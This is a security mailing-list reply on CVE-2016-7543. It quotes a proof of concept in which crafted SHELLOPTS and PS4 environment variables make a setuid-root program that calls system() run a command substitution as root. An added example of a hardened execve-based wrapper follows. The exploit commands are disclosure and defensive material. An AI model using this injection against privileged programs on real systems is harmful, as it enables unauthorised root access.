List: oss-security
Subject: [oss-security] Re: CVE-2016-7543 -- bash SHELLOPTS+PS4
From: Tavis Ormandy <taviso () cmpxchg8b ! com>
Date: 2016-09-26 23:01:03
Message-ID: mpro.oe4vxq069usvx05jg.taviso () cmpxchg8b ! com
up201407890@alunos.dcc.fc.up.pt wrote:
> The recent bash 4.4 patched an old attack vector regarding specially
> crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries
> using system()/popen().
>
> https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html
>
> "nn. Shells running as root no longer inherit PS4 from the environment,
> closing a security hole involving PS4 expansion performing command
> substitution."
>
> # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
> # chmod 4755 ./test
> # ls -l ./test
> -rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test
> # exit
> $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> uid=0(root)
> Sat Sep 10 18:06:36 WET 2016
>
> Sorry Tavis :P
>
Hah, nice work :-)
Tavis.
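
For contrast with the setuid test program quoted above, a hardened form of the same wrapper, as an added example that is not part of the original thread: it runs the target with execve() and a fixed environment instead of system(), so no shell is started and the caller's SHELLOPTS and PS4 never reach the child. The names run_clean and clean_env are hypothetical.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed, minimal environment for the child. Nothing is inherited from the
 * caller, so SHELLOPTS, PS4 and any other attacker-set variable are dropped. */
static char *const clean_env[] = {
    "PATH=/usr/bin:/bin",
    NULL
};

/* Run argv[0] directly with execve(): there is no "/bin/sh -c" step as in
 * system()/popen(), so no shell ever expands PS4.
 * Returns the child's exit status, 127 if the exec failed, -1 on error. */
int run_clean(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, clean_env);
        _exit(127);                      /* exec failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The privileged wrapper would call run_clean() where the quoted test
 * program calls system("/bin/date"). */
int main(void)
{
    char *const cmd[] = { "/bin/date", NULL };
    return run_clean(cmd) == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```

The same approach applies to popen(): create the pipe and fork yourself, then exec the target with an explicit environment.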